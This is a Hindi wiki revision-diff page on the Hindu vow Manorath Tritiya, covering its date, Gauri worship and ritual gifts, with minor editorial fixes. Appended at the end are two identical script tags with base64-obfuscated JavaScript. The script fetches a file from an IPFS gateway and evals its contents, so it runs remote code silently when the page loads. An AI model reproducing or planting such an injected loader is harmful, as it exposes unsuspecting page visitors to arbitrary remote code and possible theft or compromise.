Difference between revisions of "मनोरथ तृतीया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] तृतीया पर यह व्रत करना चाहिए।  
+
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[तृतीया]] पर यह व्रत करना चाहिए।  
 
*20 हाथों वाली [[गौरी]] की पूजा एक वर्ष तक करनी चाहिए।  
 
*20 हाथों वाली [[गौरी]] की पूजा एक वर्ष तक करनी चाहिए।  
*कर्ता जम्बू, अपामार्ग खदिर ऐसे वृक्षों की टहनियों से ही दाँत स्वच्छ करता है, वह कुछ विशेष अंजन ही प्रयोग, या केवल यक्ष कर्दम, कुछ विशिष्ट पुष्पों (यथा–मल्लिका, करवीर, केतकी) एवं नैवेद्य का प्रयोग करता है। *अन्त में आचार्य को तकिया, दर्पण आदि के साथ पलंग का दान करना चाहिए।  
+
*कर्ता जम्बू, अपामार्ग खदिर ऐसे वृक्षों की टहनियों से ही दाँत स्वच्छ करता है, वह कुछ विशेष अंजन ही प्रयोग, या केवल यक्ष कर्दम, कुछ विशिष्ट पुष्पों (यथा–मल्लिका, करवीर, [[केतकी]]) एवं नैवेद्य का प्रयोग करता है।  
 +
*अन्त में आचार्य को तकिया, दर्पण आदि के साथ पलंग का दान करना चाहिए।  
 
*4 बच्चों एवं 12 कुमारियों को भोजन करना चाहिए।  
 
*4 बच्चों एवं 12 कुमारियों को भोजन करना चाहिए।  
*ऐसी मान्यता है कि इस व्रत को करने से सभी इच्छाओं की पूर्ति होती है। <ref>स्कन्द (काशीखण्ड, 80|1-73)</ref>; <ref>व्रतराज (84-88)</ref>।
+
*ऐसी मान्यता है कि इस व्रत को करने से सभी इच्छाओं की पूर्ति होती है।<ref>स्कन्द (काशीखण्ड, 80|1-73</ref>; <ref>व्रतराज (84-88</ref>।
  
  
 
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
{{पर्व और त्योहार}}
+
{{पर्व और त्योहार}}{{व्रत और उत्सव}}
{{व्रत और उत्सव}}
+
[[Category:व्रत और उत्सव]][[Category:संस्कृति कोश]][[Category:पर्व और त्योहार]]
 
 
[[Category:व्रत और उत्सव]]
 
[[Category:संस्कृति कोश]]  
 
[[Category:पर्व और त्योहार]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 12:08, 12 July 2014

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl tritiya par yah vrat karana chahie.
  • 20 hathoan vali gauri ki pooja ek varsh tak karani chahie.
  • karta jamboo, apamarg khadir aise vrikshoan ki tahaniyoan se hi daant svachchh karata hai, vah kuchh vishesh aanjan hi prayog, ya keval yaksh kardam, kuchh vishisht pushpoan (yatha–mallika, karavir, ketaki) evan naivedy ka prayog karata hai.
  • ant mean achary ko takiya, darpan adi ke sath palang ka dan karana chahie.
  • 4 bachchoan evan 12 kumariyoan ko bhojan karana chahie.
  • aisi manyata hai ki is vrat ko karane se sabhi ichchhaoan ki poorti hoti hai.[1]; [2].


tika tippani aur sandarbh

  1. skand (kashikhand, 80|1-73
  2. vrataraj (84-88

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>